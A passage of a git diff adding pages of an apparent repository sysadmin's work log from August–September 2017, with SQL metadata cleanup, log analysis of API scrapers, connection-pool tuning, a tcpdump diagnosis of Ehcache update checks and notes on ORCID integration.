+<pre tabindex="0"><code>$ ./sparql-query http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc
+sparql$ PREFIX skos: &lt;http://www.w3.org/2004/02/skos/core#&gt;
+SELECT 
+    ?label 
+WHERE {  
+   {  ?concept  skos:altLabel ?label . } UNION {  ?concept  skos:prefLabel ?label . }
+   FILTER regex(str(?label), &#34;^fish&#34;, &#34;i&#34;) .
+} LIMIT 10;
+
+┌───────────────────────┐                                                      
+│ ?label                │                                                      
+├───────────────────────┤                                                      
+│ fisheries legislation │                                                      
+│ fishery legislation   │                                                      
+│ fishery law           │                                                      
+│ fish production       │                                                      
+│ fish farming          │                                                      
+│ fishing industry      │                                                      
+│ fisheries data        │                                                      
+│ fishing power         │                                                      
+│ fishing times         │                                                      
+│ fish passes           │                                                      
+└───────────────────────┘
+</code></pre><ul>
+<li>More examples about SPARQL syntax: <a href="https://github.com/rsinger/openlcsh/wiki/Sparql-Examples">https://github.com/rsinger/openlcsh/wiki/Sparql-Examples</a></li>
+<li>I found this blog post about speeding up the Tomcat startup time: <a href="http://skybert.net/java/improve-tomcat-startup-time/">http://skybert.net/java/improve-tomcat-startup-time/</a></li>
+<li>The startup time went from ~80s to 40s!</li>
+</ul>
+<h2 id="2017-08-19">2017-08-19</h2>
+<ul>
+<li>More examples of SPARQL queries: <a href="https://github.com/rsinger/openlcsh/wiki/Sparql-Examples">https://github.com/rsinger/openlcsh/wiki/Sparql-Examples</a></li>
+<li>Specifically the explanation of the <code>FILTER</code> regex</li>
+<li>Might want to <code>SELECT DISTINCT</code> or increase the <code>LIMIT</code> to get terms like &ldquo;wheat&rdquo; and &ldquo;fish&rdquo; to be visible</li>
+<li>Test queries online on the AGROVOC SPARQL portal: http://202.45.139.84:10035/catalogs/fao/repositories/agrovoc</li>
+</ul>
+<h2 id="2017-08-20">2017-08-20</h2>
+<ul>
+<li>Since I cleared the XMLUI cache on 2017-08-17 there haven&rsquo;t been any more <code>ERROR net.sf.ehcache.store.DiskStore</code> errors</li>
+<li>Look at the CGIAR Library to see if I can find the items that have been submitted since May:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;;
+ metadata_value_id | item_id | metadata_field_id |      text_value      | text_lang | place | authority | confidence 
+-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
+            123117 |    5872 |                11 | 2017-06-28T13:05:18Z |           |     1 |           |         -1
+            123042 |    5869 |                11 | 2017-05-15T03:29:23Z |           |     1 |           |         -1
+            123056 |    5870 |                11 | 2017-05-22T11:27:15Z |           |     1 |           |         -1
+            123072 |    5871 |                11 | 2017-06-06T07:46:01Z |           |     1 |           |         -1
+            123171 |    5874 |                11 | 2017-08-04T07:51:20Z |           |     1 |           |         -1
+(5 rows)
+</code></pre><ul>
+<li>According to <code>dc.date.accessioned</code> (metadata field id 11) there have only been five items submitted since May</li>
+<li>These are their handles:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
+   handle   
+------------
+ 10947/4658
+ 10947/4659
+ 10947/4660
+ 10947/4661
+ 10947/4664
+(5 rows)
+</code></pre><h2 id="2017-08-23">2017-08-23</h2>
+<ul>
+<li>Start testing the nginx configs for the CGIAR Library migration as well as start making a checklist</li>
+</ul>
+<h2 id="2017-08-28">2017-08-28</h2>
+<ul>
+<li>Bram had written to me two weeks ago to set up a chat about ORCID stuff but the email apparently bounced and I only found out when he emaiiled me on another account</li>
+<li>I told him I can chat in a few weeks when I&rsquo;m back</li>
+</ul>
+<h2 id="2017-08-31">2017-08-31</h2>
+<ul>
+<li>I notice that in many WLE collections Marianne Gadeberg is in the edit or approval steps, but she is also in the groups for those steps.</li>
+<li>I think we need to have a process to go back and check / fix some of these scenarios—to remove her user from the step and instead add her to the group—because we have way too many authorizations and in late 2016 we had <a href="https://github.com/ilri/rmg-ansible-public/commit/358b5ea43f9e5820986f897c9d560937c702ac6e">performance issues with Solr</a> because of this</li>
+<li>I asked Sisay about this and hinted that he should go back and fix these things, but let&rsquo;s see what he says</li>
+<li>Saw CGSpace go down briefly today and noticed SQL connection pool errors in the dspace log file:</li>
+</ul>
+<pre tabindex="0"><code>ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+</code></pre><ul>
+<li>Looking at the logs I see we have been having hundreds or thousands of these errors a few times per week in 2017-07 and almost every day in 2017-08</li>
+<li>It seems that I changed the <code>db.maxconnections</code> setting from 70 to 40 around 2017-08-14, but Macaroni Bros also reduced their hourly hammering of the REST API then</li>
+<li>Nevertheless, it seems like a connection limit is not enough and that I should increase it (as well as the system&rsquo;s PostgreSQL <code>max_connections</code>)</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-09/index.html b/docs/2017-09/index.html
new file mode 100644
index 000000000..988f7e784
--- /dev/null
+++ b/docs/2017-09/index.html
@@ -0,0 +1,713 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2017" />
+<meta property="og:description" content="2017-09-06
+
+Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
+
+2017-09-07
+
+Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-09/" />
+<meta property="article:published_time" content="2017-09-07T16:54:52+07:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2017"/>
+<meta name="twitter:description" content="2017-09-06
+
+Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
+
+2017-09-07
+
+Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-09/",
+  "wordCount": "4199",
+  "datePublished": "2017-09-07T16:54:52+07:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-09/">
+
+    <title>September, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-09/">September, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-09-07T16:54:52+07:00">Thu Sep 07, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-09-06">2017-09-06</h2>
+<ul>
+<li>Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours</li>
+</ul>
+<h2 id="2017-09-07">2017-09-07</h2>
+<ul>
+<li>Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group</li>
+</ul>
+<h2 id="2017-09-10">2017-09-10</h2>
+<ul>
+<li>Delete 58 blank metadata values from the CGSpace database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+DELETE 58
+</code></pre><ul>
+<li>I also ran it on DSpace Test because we&rsquo;ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate</li>
+<li>Run system updates and restart DSpace Test</li>
+<li>We only have 7.7GB of free space on DSpace Test so I need to copy some data off of it before doing the CGIAR Library migration (requires lots of exporting and creating temp files)</li>
+<li>I still have the original data from the CGIAR Library so I&rsquo;ve zipped it up and sent it off to linode18 for now</li>
+<li>sha256sum of <code>original-cgiar-library-6.6GB.tar.gz</code> is: bcfabb52f51cbdf164b61b7e9b3a0e498479e4c1ed1d547d32d11f44c0d5eb8a</li>
+<li>Start doing a test run of the CGIAR Library migration locally</li>
+<li>Notes and todo checklist here for now: <a href="https://gist.github.com/alanorth/3579b74e116ab13418d187ed379abd9c">https://gist.github.com/alanorth/3579b74e116ab13418d187ed379abd9c</a></li>
+<li>Create pull request for Phase I and II changes to CCAFS Project Tags: <a href="https://github.com/ilri/DSpace/pull/336">#336</a></li>
+<li>We&rsquo;ve been discussing with Macaroni Bros and CCAFS for the past month or so and the list of tags was recently finalized</li>
+<li>There will need to be some metadata updates — though if I recall correctly it is only about seven records — for that as well, I had made some notes about it in <a href="/cgspace-notes/2017-07">2017-07</a>, but I&rsquo;ve asked for more clarification from Lili just in case</li>
+<li>Looking at the DSpace logs to see if we&rsquo;ve had a change in the &ldquo;Cannot get a connection&rdquo; errors since last month when we adjusted the <code>db.maxconnections</code> parameter on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-09-*
+dspace.log.2017-09-01:0
+dspace.log.2017-09-02:0
+dspace.log.2017-09-03:9
+dspace.log.2017-09-04:17
+dspace.log.2017-09-05:752
+dspace.log.2017-09-06:0
+dspace.log.2017-09-07:0
+dspace.log.2017-09-08:10
+dspace.log.2017-09-09:0
+dspace.log.2017-09-10:0
+</code></pre><ul>
+<li>Also, since last month (2017-08) Macaroni Bros no longer runs their REST API scraper every hour, so I&rsquo;m sure that helped</li>
+<li>There are still some errors, though, so maybe I should bump the connection limit up a bit</li>
+<li>I remember seeing that Munin shows that the average number of connections is 50 (which is probably mostly from the XMLUI) and we&rsquo;re currently allowing 40 connections per app, so maybe it would be good to bump that value up to 50 or 60 along with the system&rsquo;s PostgreSQL <code>max_connections</code> (formula should be: webapps * 60 + 3, or 3 * 60 + 3 = 183 in our case)</li>
+<li>I updated both CGSpace and DSpace Test to use these new settings (60 connections per web app and 183 for system PostgreSQL limit)</li>
+<li>I&rsquo;m expecting to see 0 connection errors for the next few months</li>
+</ul>
+<h2 id="2017-09-11">2017-09-11</h2>
+<ul>
+<li>Lots of work testing the CGIAR Library migration</li>
+<li>Many technical notes and TODOs here: <a href="https://gist.github.com/alanorth/3579b74e116ab13418d187ed379abd9c">https://gist.github.com/alanorth/3579b74e116ab13418d187ed379abd9c</a></li>
+</ul>
+<h2 id="2017-09-12">2017-09-12</h2>
+<ul>
+<li>I was testing the <a href="https://wiki.lyrasis.org/display/DSDOC5x/AIP+Backup+and+Restore#AIPBackupandRestore-AIPConfigurationsToImproveIngestionSpeedwhileValidating">METS XSD caching during AIP ingest</a> but it doesn&rsquo;t seem to help actually</li>
+<li>The import process takes the same amount of time with and without the caching</li>
+<li>Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):</li>
+</ul>
+<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and &#39;tcp[32:4] = 0x47455420&#39;
+</code></pre><ul>
+<li>Great TCP dump guide here: <a href="https://danielmiessler.com/study/tcpdump">https://danielmiessler.com/study/tcpdump</a></li>
+<li>The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation</li>
+<li>I sent a message to the mailing list to see if anyone knows more about this</li>
+<li>In looking at the tcpdump results I notice that there is an update check to the ehcache server on <em>every</em> iteration of the ingest loop, for example:</li>
+</ul>
+<pre tabindex="0"><code>09:39:36.008956 IP 192.168.8.124.50515 &gt; 157.189.192.67.http: Flags [P.], seq 1736833672:1736834103, ack 147469926, win 4120, options [nop,nop,TS val 1175113331 ecr 550028064], length 431: HTTP: GET /kit/reflector?kitID=ehcache.default&amp;pageID=update.properties&amp;id=2130706433&amp;os-name=Mac+OS+X&amp;jvm-name=Java+HotSpot%28TM%29+64-Bit+Server+VM&amp;jvm-version=1.8.0_144&amp;platform=x86_64&amp;tc-version=UNKNOWN&amp;tc-product=Ehcache+Core+1.7.2&amp;source=Ehcache+Core&amp;uptime-secs=0&amp;patch=UNKNOWN HTTP/1.1
+</code></pre><ul>
+<li>Turns out this is a known issue and Ehcache has refused to make it opt-in: <a href="https://jira.terracotta.org/jira/browse/EHC-461">https://jira.terracotta.org/jira/browse/EHC-461</a></li>
+<li>But we can disable it by adding an <code>updateCheck=&quot;false&quot;</code> attribute to the main <code>&lt;ehcache &gt;</code> tag in <code>dspace-services/src/main/resources/caching/ehcache-config.xml</code></li>
+<li>After re-compiling and re-deploying DSpace I no longer see those update checks during item submission</li>
+<li>I had a Skype call with Bram Luyten from Atmire to discuss various issues related to ORCID in DSpace
+<ul>
+<li>First, ORCID is deprecating their version 1 API (which DSpace uses) and in version 2 API they have removed the ability to search for users by name</li>
+<li>The logic is that searching by name actually isn&rsquo;t very useful because ORCID is essentially a global phonebook and there are tons of legitimately duplicate and ambiguous names</li>
+<li>Atmire&rsquo;s proposed integration would work by having users lookup and add authors to the authority core directly using their ORCID ID itself (this would happen during the item submission process or perhaps as a standalone / batch process, for example to populate the authority core with a list of known ORCIDs)</li>
+<li>Once the association between name and ORCID is made in the authority then it can be autocompleted in the lookup field</li>
+<li>Ideally there could also be a user interface for cleanup and merging of authorities</li>
+<li>He will prepare a quote for us with keeping in mind that this could be useful to contribute back to the community for a 5.x release</li>
+<li>As far as exposing ORCIDs as flat metadata along side all other metadata, he says this should be possible and will work on a quote for us</li>
+</ul>
+</li>
+</ul>
+<h2 id="2017-09-13">2017-09-13</h2>
+<ul>
+<li>Last night Linode sent an alert about CGSpace (linode18) that it has exceeded the outbound traffic rate threshold of 10Mb/s for the last two hours</li>
+<li>I wonder what was going on, and looking into the nginx logs I think maybe it&rsquo;s OAI&hellip;</li>
+<li>Here is yesterday&rsquo;s top ten IP addresses making requests to <code>/oai</code>:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
+      1 213.136.89.78
+      1 66.249.66.90
+      1 66.249.66.92
+      3 68.180.229.31
+      4 35.187.22.255
+  13745 54.70.175.86
+  15814 34.211.17.113
+  15825 35.161.215.53
+  16704 54.70.51.7
+</code></pre><ul>
+<li>Compared to the previous day&rsquo;s logs it looks VERY high:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
+      1 207.46.13.39
+      1 66.249.66.93
+      2 66.249.66.91
+      4 216.244.66.194
+     14 66.249.66.90
+</code></pre><ul>
+<li>The user agents for those top IPs are:
+<ul>
+<li>54.70.175.86: API scraper</li>
+<li>34.211.17.113: API scraper</li>
+<li>35.161.215.53: API scraper</li>
+<li>54.70.51.7: API scraper</li>
+</ul>
+</li>
+<li>And this user agent has never been seen before today (or at least recently!):</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;API scraper&#34; /var/log/nginx/oai.log
+62088
+# zgrep -c &#34;API scraper&#34; /var/log/nginx/oai.log.*.gz
+/var/log/nginx/oai.log.10.gz:0
+/var/log/nginx/oai.log.11.gz:0
+/var/log/nginx/oai.log.12.gz:0
+/var/log/nginx/oai.log.13.gz:0
+/var/log/nginx/oai.log.14.gz:0
+/var/log/nginx/oai.log.15.gz:0
+/var/log/nginx/oai.log.16.gz:0
+/var/log/nginx/oai.log.17.gz:0
+/var/log/nginx/oai.log.18.gz:0
+/var/log/nginx/oai.log.19.gz:0
+/var/log/nginx/oai.log.20.gz:0
+/var/log/nginx/oai.log.21.gz:0
+/var/log/nginx/oai.log.22.gz:0
+/var/log/nginx/oai.log.23.gz:0
+/var/log/nginx/oai.log.24.gz:0
+/var/log/nginx/oai.log.25.gz:0
+/var/log/nginx/oai.log.26.gz:0
+/var/log/nginx/oai.log.27.gz:0
+/var/log/nginx/oai.log.28.gz:0
+/var/log/nginx/oai.log.29.gz:0
+/var/log/nginx/oai.log.2.gz:0
+/var/log/nginx/oai.log.30.gz:0
+/var/log/nginx/oai.log.3.gz:0
+/var/log/nginx/oai.log.4.gz:0
+/var/log/nginx/oai.log.5.gz:0
+/var/log/nginx/oai.log.6.gz:0
+/var/log/nginx/oai.log.7.gz:0
+/var/log/nginx/oai.log.8.gz:0
+/var/log/nginx/oai.log.9.gz:0
+</code></pre><ul>
+<li>Some of these heavy users are also using XMLUI, and their user agent isn&rsquo;t matched by the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/tomcat/server-tomcat7.xml.j2#L158">Tomcat Session Crawler valve</a>, so each request uses a different session</li>
+<li>Yesterday alone the IP addresses using the <code>API scraper</code> user agent were responsible for 16,000 sessions in XMLUI:</li>
+</ul>
+<pre tabindex="0"><code># grep -a -E &#34;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&#34; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+15924
+</code></pre><ul>
+<li>If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex</li>
+<li>A search for &ldquo;API scraper&rdquo; user agent on Google returns a <code>robots.txt</code> with a comment that this is the Yewno bot: <a href="http://www.escholarship.org/robots.txt">http://www.escholarship.org/robots.txt</a></li>
+<li>Also, in looking at the DSpace logs I noticed a warning from OAI that I should look into:</li>
+</ul>
+<pre tabindex="0"><code>WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+</code></pre><ul>
+<li>Looking at the spreadsheet with deletions and corrections that CCAFS sent last week</li>
+<li>It appears they want to delete a lot of metadata, which I&rsquo;m not sure they realize the implications of:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;) group by text_value;                                                                                                                                                                                                                  
+        text_value        | count                              
+--------------------------+-------                             
+ FP4_ClimateModels        |     6                              
+ FP1_CSAEvidence          |     7                              
+ SEA_UpscalingInnovation  |     7                              
+ FP4_Baseline             |    69                              
+ WA_Partnership           |     1                              
+ WA_SciencePolicyExchange |     6                              
+ SA_GHGMeasurement        |     2                              
+ SA_CSV                   |     7                              
+ EA_PAR                   |    18                              
+ FP4_Livestock            |     7                              
+ FP4_GenderPolicy         |     4                              
+ FP2_CRMWestAfrica        |    12                              
+ FP4_ClimateData          |    24                              
+ FP4_CCPAG                |     2                              
+ SEA_mitigationSAMPLES    |     2                              
+ SA_Biodiversity          |     1                              
+ FP4_PolicyEngagement     |    20                              
+ FP3_Gender               |     9                              
+ FP4_GenderToolbox        |     3                              
+(19 rows)
+</code></pre><ul>
+<li>I sent CCAFS people an email to ask if they really want to remove these 200+ tags</li>
+<li>She responded yes, so I&rsquo;ll at least need to do these deletes in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
+DELETE 207
+</code></pre><ul>
+<li>When we discussed this in late July there were some other renames they had requested, but I don&rsquo;t see them in the current spreadsheet so I will have to follow that up</li>
+<li>I talked to Macaroni Bros and they said to just go ahead with the other corrections as well as their spreadsheet was evolved organically rather than systematically!</li>
+<li>The final list of corrections and deletes should therefore be:</li>
+</ul>
+<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
+update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
+update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
+delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
+</code></pre><ul>
+<li>Create and merge pull request to shut up the Ehcache update check (<a href="https://github.com/ilri/DSpace/pull/337">#337</a>)</li>
+<li>Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): <a href="https://jira.duraspace.org/browse/DS-1492">https://jira.duraspace.org/browse/DS-1492</a></li>
+<li>I commented there suggesting that we disable it globally</li>
+<li>I merged the changes to the CCAFS project tags (<a href="https://github.com/ilri/DSpace/pull/336">#336</a>) but still need to finalize the metadata deletions/renames</li>
+<li>I merged the CGIAR Library theme changes (<a href="https://github.com/ilri/DSpace/pull/338">#338</a>) to the <code>5_x-prod</code> branch in preparation for next week&rsquo;s migration</li>
+<li>I emailed the Handle administrators (<a href="mailto:hdladmin@cnri.reston.va.us">hdladmin@cnri.reston.va.us</a>) to ask them what the process for changing their prefix to be resolved by our resolver</li>
+<li>They responded and said that they need email confirmation from the contact of record of the other prefix, so I should have the CGIAR System Organization people email them before I send the new <code>sitebndl.zip</code></li>
+<li>Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database</li>
+<li>Here are all my distinct authority combinations in the database before:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(8 rows)
+</code></pre><ul>
+<li>And then after adding a new item and selecting an existing &ldquo;Orth, Alan&rdquo; with an ORCID in the author lookup:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |         -1
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |          0
+ Orth, Alan | cb3aa5ae-906f-4902-97b1-2667cf148dde |        600
+ Orth, Alan | 0d575fa3-8ac4-4763-a90a-1248d4791793 |         -1
+ Orth, Alan | 67a9588f-d86a-4155-81a2-af457e9d13f9 |        600
+(9 rows)
+</code></pre><ul>
+<li>It created a new authority&hellip; let&rsquo;s try to add another item and select the same existing author and see what happens in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
+ text_value |              authority               | confidence 
+------------+--------------------------------------+------------
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |         -1
+ Orth, Alan | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+ Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
